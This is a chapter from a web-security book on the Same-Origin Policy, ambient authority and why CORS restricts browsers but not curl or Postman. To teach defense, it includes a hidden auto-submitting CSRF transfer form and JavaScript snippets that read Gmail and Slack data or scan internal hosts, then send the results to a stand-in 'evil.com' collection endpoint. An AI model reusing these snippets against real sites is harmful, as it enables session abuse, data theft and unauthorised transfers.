Why Browsers Are Paranoid
In the last chapter, we established that the Same-Origin Policy blocks cross-origin reads in the browser, and that CORS is the server's way of saying "no, really, let them in." But we didn't answer the deeper question: why?
Why does the browser enforce this restriction when curl, Postman, wget, Python's
requests library, and every server-side HTTP client on the planet don't? Are
browsers just being difficult?
No. Browsers have a very good reason. And once you understand it, every CORS decision you'll ever make will suddenly make sense.
The Ambient Authority Problem
Here's the single most important concept in this entire book. If you remember nothing else, remember this:
Browsers automatically attach credentials to requests.
When your browser sends a request to https://mybank.com, it automatically includes:
- Cookies for
mybank.com - HTTP Basic/Digest auth credentials if you've entered them for that domain
- TLS client certificates if configured
- Windows Integrated Authentication (Kerberos/NTLM) tokens on corporate networks
This happens automatically. The user doesn't click "attach my cookies." The JavaScript
doesn't have to explicitly add them (though credentials: 'include' controls whether
fetch sends them cross-origin). The browser just... does it. This is called
ambient authority.
Now think about what this means. When evil-site.com tells your browser to make a
request to mybank.com, the browser will attach your banking cookies to that
request. The bank's server sees a request with a valid session cookie and thinks it's
you. As far as the server can tell, you — the authenticated user — are making this
request.
This is fundamentally different from any other HTTP client:
| Client | Attaches your cookies automatically? | Has your active sessions? |
|---|---|---|
| Browser | Yes | Yes |
| curl | No. You'd have to manually copy cookies. | No. |
| Postman | No. You configure auth explicitly. | No. |
| Python requests | No. You pass credentials in code. | No. |
| Your backend server | No. It has its own identity. | No. |
When you use curl, you're making a request as curl. When a browser makes a request, it's making a request as the logged-in user, with all their authority. That's the difference. That's the whole thing.
# curl: no cookies, no session, no ambient authority
$ curl https://mybank.com/api/accounts
# Returns: 401 Unauthorized
# Browser: automatically attaches your session cookie
# fetch('https://mybank.com/api/accounts')
# Returns: 200 OK with your actual account data
CSRF: The Attack That Proves the Point
Let's make this concrete with a Cross-Site Request Forgery (CSRF) attack. This is the canonical example of why ambient authority is dangerous.
The Setup
-
You're logged into
https://mybank.com. Your browser has a session cookie:Cookie: session=abc123def456 -
The bank has a transfer endpoint:
POST https://mybank.com/api/transfer Content-Type: application/x-www-form-urlencoded to=alice&amount=100
The Attack
You visit https://evil-site.com, which serves this HTML:
<h1>Congratulations! You've won a free iPad!</h1>
<!-- Hidden form that auto-submits -->
<iframe name="hidden-frame" style="display:none"></iframe>
<form id="attack" action="https://mybank.com/api/transfer"
method="POST" target="hidden-frame">
<input type="hidden" name="to" value="evil-hacker">
<input type="hidden" name="amount" value="10000">
</form>
<script>
document.getElementById('attack').submit();
</script>
Here's what happens:
- The page loads.
- JavaScript submits the hidden form.
- Your browser automatically attaches your
mybank.comsession cookie to the POST request. - The bank's server receives what looks like a completely legitimate transfer request from an authenticated user.
- $10,000 goes to
evil-hacker.
The attacker never needed to know your password. They never needed your cookies. They just needed your browser to do what it always does — automatically attach your credentials to the request.
Why the SOP Doesn't Fully Prevent This
Wait — didn't we just spend a whole chapter saying the SOP prevents cross-origin problems? Here's the subtlety:
The SOP prevents reading cross-origin responses. It does NOT prevent sending cross-origin requests.
The form submission above? It sends the POST. The SOP only prevents the JavaScript from reading the response. The attacker doesn't need the response — the damage (the money transfer) happens from the request alone.
This is the distinction that trips up most developers:
┌─────────────────────────────────────────────────────────────┐
│ Cross-Origin Request │
│ │
│ Sending the request: ALLOWED for simple requests │
│ (forms, basic fetches) │
│ │
│ Reading the response: BLOCKED by SOP │
│ (unless CORS headers present) │
│ │
│ Why? Because the web was built on cross-origin form │
│ submissions and image loads. Blocking sends would have │
│ broken the entire existing web in 1996. │
└─────────────────────────────────────────────────────────────┘
The SOP protects against data theft (reading your bank balance). It does not fully protect against state-changing actions (transferring your money). That's why CSRF tokens exist — they're a separate defense mechanism for the separate problem of forged requests.
CSRF Defenses (Brief Aside)
Since we're here, the standard defenses against CSRF are:
-
CSRF tokens: server generates a random token, embeds it in the form, and requires it on submission. The attacker can't read the token (thanks, SOP!) so they can't include it in their forged form.
-
SameSite cookies: the
SameSiteattribute on cookies tells the browser not to send them on cross-origin requests.Set-Cookie: session=abc123; SameSite=Lax; Secure; HttpOnly -
Checking the
Originheader: the server rejects requests where theOriginheader doesn't match expected values.
All of these defenses exist because the SOP alone isn't sufficient for state-changing requests. Keep this in mind — it's the entire reason CORS has the concept of "preflighted" requests, which we'll cover in a later chapter.
Why curl Doesn't Have CORS Issues
I've lost count of the number of times someone has posted a question that boils down to: "It works in curl but not in my browser. What's wrong with my browser?"
Nothing is wrong with your browser. Your browser is doing its job. Let's look at the same request from both perspectives.
From curl
$ curl -v https://api.example.com/data
> GET /data HTTP/2
> Host: api.example.com
> User-Agent: curl/8.4.0
> Accept: */*
>
< HTTP/2 200
< content-type: application/json
< date: Sat, 21 Mar 2026 14:30:00 GMT
<
{"message": "Here's your data"}
curl sends the request. The server responds. curl shows you the response. No origin checks, no SOP, no CORS. There is no "origin" because curl isn't a web page loaded from some domain. It's a command-line tool running directly by a human (or a script that a human wrote and chose to run).
The security model is simple: if you have access to run curl on a machine, you already have authority to make HTTP requests from that machine. There's no ambient authority to protect against.
From the browser
// Page loaded from https://my-app.com
fetch('https://api.example.com/data')
.then(r => r.json())
.then(console.log);
The browser's internal monologue goes something like:
- "A script from
https://my-app.comwants to fetch fromhttps://api.example.com." - "Those are different origins."
- "I need to check if
api.example.comsays this is OK." - "Let me look at the response headers..."
- "No
Access-Control-Allow-Originheader. Request denied."
// Console:
Access to fetch at 'https://api.example.com/data' from origin
'https://my-app.com' has been blocked by CORS policy: No
'Access-Control-Allow-Origin' header is present on the requested resource.
The key insight
The browser adds a layer of protection because it runs untrusted code on behalf of the user. When you visit a website, you're implicitly running that website's JavaScript in a sandbox. You didn't audit that code. You probably don't even know what it does. The browser's job is to make sure that code can't abuse the authority it has (your cookies, your sessions, your identity).
curl doesn't run untrusted code. You are the one running curl. You made a deliberate choice to make that request. The trust model is completely different.
Why Postman Works Fine But Your Browser Doesn't
Same reason as curl. Postman is a standalone application that you, the developer, are deliberately using to send specific requests. It doesn't automatically attach your browser's cookies (it has its own cookie jar, which you explicitly configure). There's no ambient authority. There's no "untrusted script running in a sandbox."
When Postman sends a request:
GET /api/data HTTP/1.1
Host: api.example.com
Authorization: Bearer <token-you-explicitly-configured>
The developer explicitly set that auth header. Postman didn't steal it from a browser session. The server can trust that whoever made this request intended to make it, because Postman doesn't run drive-by JavaScript from random websites.
When people ask me "why does my API work in Postman but not in the browser?", I ask them back: "Does Postman automatically log into your Gmail when you open it?" No? That's your answer.
The Trust Model: Server-to-Server vs Browser-to-Server
It helps to think about two fundamentally different communication patterns on the web:
Server-to-Server Communication
┌──────────────┐ ┌──────────────┐
│ Your API │ ────> │ Their API │
│ Server │ <──── │ Server │
└──────────────┘ └──────────────┘
Your backend calls another backend. There are no cookies being implicitly attached. There are no user sessions being silently hijacked. Whatever credentials are used (API keys, OAuth tokens, mTLS certificates), they were explicitly configured by a developer who had direct access to the server.
There is no SOP and no CORS in this model. Two servers talking to each other is just HTTP. The concept of "origin" doesn't even apply — servers don't have an origin in the browser security sense.
# Server-side code (Node.js) - no CORS issues
const response = await fetch('https://api.stripe.com/v1/charges', {
headers: {
'Authorization': 'Bearer sk_live_...',
'Content-Type': 'application/x-www-form-urlencoded'
},
method: 'POST',
body: 'amount=2000¤cy=usd'
});
// Works fine. No browser. No SOP. No CORS.
Browser-to-Server Communication
┌──────────────┐
│ Browser │ (with cookies for bank.com, email.com, etc.)
│ running │
│ untrusted │
│ JavaScript │
└──────┬───────┘
│
│ "I want to fetch from bank.com"
│ (browser automatically attaches bank.com cookies)
│
▼
┌──────────────┐
│ bank.com │ "This looks like a legit request from
│ Server │ an authenticated user..."
└──────────────┘
This is the dangerous case. The browser is running JavaScript that the user didn't write and probably didn't review. That JavaScript has indirect access to the user's authenticated sessions on every site they're logged into. The SOP exists to prevent that JavaScript from exploiting those sessions.
Concrete Attack Scenarios the SOP Prevents
Let's walk through several attacks that would be trivial without the SOP.
Attack 1: Reading email
Without SOP, any website could:
// Attacker's page at https://evil.com
// User is logged into Gmail
const response = await fetch('https://mail.google.com/mail/u/0/h/', {
credentials: 'include'
});
const html = await response.text();
// Parse the HTML, extract email contents
// Send them to the attacker's server
The SOP blocks evil.com from reading the response from mail.google.com.
Attack 2: Internal network reconnaissance
Your browser is on a corporate network. Without SOP:
// Attacker's page (hosted on the public internet)
// Scan internal network addresses
for (let i = 1; i < 255; i++) {
try {
const r = await fetch(`http://192.168.1.${i}:8080/api/health`);
const data = await r.text();
// Found an internal service! Report it back.
navigator.sendBeacon('https://evil.com/collect', JSON.stringify({
ip: `192.168.1.${i}`,
response: data
}));
} catch (e) {
// Host not reachable, move on
}
}
Your browser sits inside the corporate firewall. The attacker's server does not. But if they can get your browser to make requests to internal hosts and read the responses, they've effectively bypassed the firewall using your browser as a proxy. The SOP prevents the reading of those responses.
(Note: the requests themselves may still be sent — remember, SOP blocks reads, not sends. This is why network security shouldn't rely solely on firewalls. But without being able to read the responses, the attacker can't do much reconnaissance.)
Attack 3: Session token theft via API
Many single-page applications have an API endpoint that returns user info:
// Attacker's page
const response = await fetch('https://slack.com/api/auth.test', {
credentials: 'include'
});
const data = await response.json();
// data.user, data.team, data.user_id — all yours now
The SOP prevents evil.com from reading Slack's API responses. Even though your
browser would attach the cookies, the JavaScript can't see what came back.
Attack 4: Cross-origin WebSocket hijacking
WebSockets are interesting because once established, they don't follow the standard SOP pattern. However, the initial handshake does include cookies:
// Attacker's page
const ws = new WebSocket('wss://trading-platform.com/live');
ws.onmessage = (event) => {
// Read real-time trading data
fetch('https://evil.com/collect', {
method: 'POST',
body: event.data
});
};
WebSocket servers need to check the Origin header themselves — the browser sends it,
but WebSocket connections aren't subject to CORS in the normal way. This is a real
attack vector that has bitten production systems. Always validate the Origin header
in your WebSocket handshake code.
"Sending" vs "Reading": A Deeper Look
This distinction is so important and so frequently misunderstood that it's worth a dedicated section. Let's trace exactly what happens at the network level for a cross-origin fetch.
The network trace
Let's watch this with curl in verbose mode, simulating what the browser does:
# This is approximately what the browser sends
$ curl -v https://api.example.com/data \
-H "Origin: https://my-app.com" \
-H "Cookie: session=abc123"
> GET /data HTTP/2
> Host: api.example.com
> Origin: https://my-app.com
> Cookie: session=abc123
>
< HTTP/2 200
< content-type: application/json
< date: Sat, 21 Mar 2026 14:30:00 GMT
<
< (no Access-Control-Allow-Origin header)
<
{"secret": "data"}
At the network level, the request went out, the server processed it, and the response came back. The response bytes traveled across the network and arrived at the browser. The browser received them.
But when JavaScript tries to access response.json(), the browser says no. The data
is right there, sitting in the browser's network stack, and the browser refuses to
hand it to JavaScript.
In Chrome DevTools, you can see evidence of this:
- Open Network tab
- Make the cross-origin request
- Click on the request
- The Headers tab shows the response headers (sometimes — Chrome has gotten better at hiding these in recent versions)
- The Response tab may show "(failed to load response data)" even though the data arrived
- The Timing tab shows the full request/response lifecycle — the bytes definitely came back
The browser is not a firewall. It received the response. It's just refusing to hand it to the potentially-untrusted JavaScript that asked for it.
Why this matters for security
If you're thinking "the data still traveled over the network, so an attacker with a packet sniffer could read it anyway" — you're right, but that's a different threat model. The SOP protects against remote attackers who can trick your browser into making requests. It doesn't protect against local attackers with access to your network traffic (that's what TLS is for).
The threat model for SOP is:
- Attacker controls a website you visit
- Attacker can run JavaScript in your browser
- Attacker cannot see raw network traffic
- Attacker cannot access the browser's internal memory
Given those constraints, preventing JavaScript from reading cross-origin responses is an effective defense.
The Browser's Perspective
I find it helpful to personify the browser. Imagine the browser as an extremely cautious security guard at a building:
-
curl/Postman: An employee with a badge. They walk up to any door, swipe their badge, and go in. They're responsible for their own actions.
-
Browser JavaScript: A visitor being escorted by the security guard. The visitor can ask the guard to open doors, but the guard checks with the room's owner first. "Hey, there's someone from app.coolstartup.io here who wants to see your data. Are they on your list?" If the room owner (the server) says yes (via CORS headers), the guard lets them read the response. If not, the guard says "sorry, can't help you" — even if the guard already peeked inside and saw the data.
Summary
The browser is not being paranoid. It's being appropriately cautious, given that:
- It runs untrusted code from arbitrary websites.
- It automatically attaches user credentials to requests.
- It has access to the user's authenticated sessions on every site.
Any client with those three properties must restrict cross-origin access. If curl automatically attached your bank cookies when running a script you downloaded from the internet, it would need the same restrictions.
The SOP and CORS exist because browsers are in a uniquely dangerous position: they're
the only HTTP client that combines untrusted code execution with
ambient authority. That combination is why your fetch() call fails in the browser
but works everywhere else. It's not a bug. It's the browser doing its job.
What's Next
We've established why the browser cares about origins. But what exactly is an origin? It seems simple — but like everything in web security, the edge cases will haunt you. Let's look at origins, schemes, ports, and all the ways they can differ in Chapter 3.